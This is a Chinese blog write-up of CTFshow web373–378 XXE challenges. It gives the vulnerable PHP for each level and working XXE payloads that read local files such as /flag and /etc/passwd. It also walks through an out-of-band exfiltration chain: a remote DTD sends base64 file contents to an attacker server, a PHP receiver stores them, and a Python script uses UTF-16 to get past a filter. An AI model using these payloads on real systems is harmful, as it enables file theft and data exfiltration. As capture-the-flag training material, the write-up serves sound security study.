CTFshow web入门-xxe

最新推荐文章于 2024-06-20 21:27:55 发布
最新推荐文章于 2024-06-20 21:27:55 发布
阅读量260 收藏
点赞数
文章标签: php linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74097148/article/details/130793604
版权

web373

题目给了一个有xxe漏洞的,并且文件内容可以回显

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);
?>

payload如下,bp抓包发送即可

<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<H3rmesk1t>
	<ctfshow>
		&xxe;
	</ctfshow>
</H3rmesk1t>

web374-376

<?php
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    
?>

与上一题大差不差,但文件内容不可回显,那我们可以让我们传入的xml之后所读取的文件内容,转到我们的服务器上查看

bp抓包发送如下内容

<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/pd.dtd">
%dtd;
%send;
] >

提前服务器上创建pd.dtd

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://xxx/xxe.php?q=%file;'>"
>
%all;

提前服务器上创建xxe.php

<?php
highlight_file(__FILE__);
$xxe = base64_decode($_GET['q']);
$txt = 'flag.txt';
file_put_contents($txt,$xxe,FILE_APPEND)
?>

发送后发现服务器上多了flag.txt

下面两关分别是过滤了xml,version=1或0

过滤了xml,version=1或0,和大小写

不过上述的payload是通杀的

web377

<?php
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
?>

过滤了http

也是要在远程服务器配置dtd,同上

python完成post,记得设定编码方式

import requests

url = 'http://xxx'
data = """<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/pd.dtd">
%dtd;
%send;
] >"""

requests.post(url ,data=data.encode('utf-16'))
print("done!")

done完会看到服务器上生成flag.txt

web378

抓包发现,回显usename,那就是标准的xxe了

构造payload如下 

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>123</password>
</user>

 

hybcx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow web入门 信息搜集
m0_50043719的博客
01-11 563
ctfshow web入门 信息搜集
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储和传输数据的语言,它的设计目标是为了传输和存储结构化数据,而非像HTML那样主要用于展示数据的外观。XML文档通常包含XML声明、DTD(Document ...
CTFShow-Web入门
weixin_58546222的博客
12-04 2315
CTFShow-信息收集
CTFshow-Web入门-Web1-20 (信息收集完结篇)
m0_61155226的博客
03-07 7717
CTFshow-Web入门-Web11-20 (信息收集完结篇)
从0开始学web——ctfshow web入门:信息搜集
最新发布
2301_80146720的博客
06-20 1137
【1】robots是搜索引擎爬虫协议,也就是你网站和爬虫的协议。【2】由于robots文件是一个纯文本文件,也就是常见的.txt文件,而且必须要存放在网站的根目录下,所以域名/robots.txt 是可以访问文件。针对本题:首先域名后增加/robots.txt,得到提示为:flagishere.txt域名后增加/flagishere.txt,获得本题flag。
CTFshow-WEB入门-信息搜集
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
02-11 1339
web1(查看注释1) wp 右键查看源代码即可找到flag web2(查看注释2) wp 【Ctrl+U】快捷键查看源代码即可找到flag web3(抓包与重发包) wp 抓包后重新发包,在响应包中找到flag web4(robots协议) wp 先访问robots.txt,得到线索 进而访问flagishere.txt,获得flag web5(phps源码泄露) wp 访问index.phps获得泄露文件
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2217
CTFShow-WEB入门篇--信息搜集详细Wp
WebGoat8-xxe注入漏洞分析
09-15
Web 应用程序安全测试中,XXE(XML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 XXE 注入漏洞的工作...
java8看不到源码-Apache-OFBiz-XXE:ApacheOFBiz<16.11.04的XXE注入(文件泄露)漏洞利用
06-04
XXE Apache OFBiz < 16.11.04 的 XXE 注入(文件泄露)漏洞利用 信息 16.11.04 版本之前的 Apache OFBiz 包含两个不同的 XXE 注入漏洞。 每个漏洞的公开披露可以在下面找到: [1] [2] 此漏洞利用针对链接 1 中...
SAML-XXE-Test:专为SAML接口生成的简单XXE测试套件
05-18
SAML-XXE-测试 一个专门为SAML接口生成的简单XXE测试套件。 介绍 是一种基于XML的标记语言,SAML端点使用的XML解析器可能容易受到。 SAML消息通常使用Base64Url()编码进行传输,并且可能会另外放气(取决于所使用的...
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
ctfshow-Web入门-sherlock
m0_58327783的博客
04-13 512
信息泄露可以参考https://blog.csdn.net/a597934448/article/details/105431367。
CTFshow Web入门 命令执行
m0_62905261的博客
05-01 1279
CTFshow Web入门 命令执行
《CTFshow-Web入门》05. Web 41~50
学习学习学习......
04-10 1328
eval() 利用与正则绕过,或运算【|】构造可用字符、system() 利用与正则绕过,{>/dev/null 2>&1} 绕过。
ctfshow web入门(21-28爆破)
2202_75317918的博客
09-23 526
ctfshow web入门(21-28爆破)
ctfshow中web入门题关键解题思路
cutesharkl的博客
07-10 377
查看页面源代码。
CTFweb篇-PHP伪协议的使用
weixin_44597701的博客
08-05 1412
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。(不明白啥子鬼意思) 就是PHP伪协议可以用来作为输入输出,以此来占为己用 php://stdin 相当于打开一个文件指针,可以从输入缓冲区读取输入。 ...
ctfshow web入门 (命令执行)
m0_69289738的博客
09-04 133
这题与上题相似,多过滤了一个system和php,这题就使用反引号执行代码,因为php被过滤,所以用问号代替。使用system('ls')看到有flag.php,直接cat flag.php,查看源代码得到flag。使用system命令把flag.php记录到1.txt。输入system('ls')发现flag.php。我们使用问号代替,再次访问,拿到flag。或者tac flag.php得到flag。我们直接访问flag.php是不会显示的。发现不行,因为flag被过滤了。访问1.txt,拿到flag。
ctfshow web 入门xxe
08-23
要利用XXE漏洞进行ctfshow的Web入门,可以构造一个恶意的XML实体,例如: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test> <ctfshow>&xxe;</ctfshow&gt...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值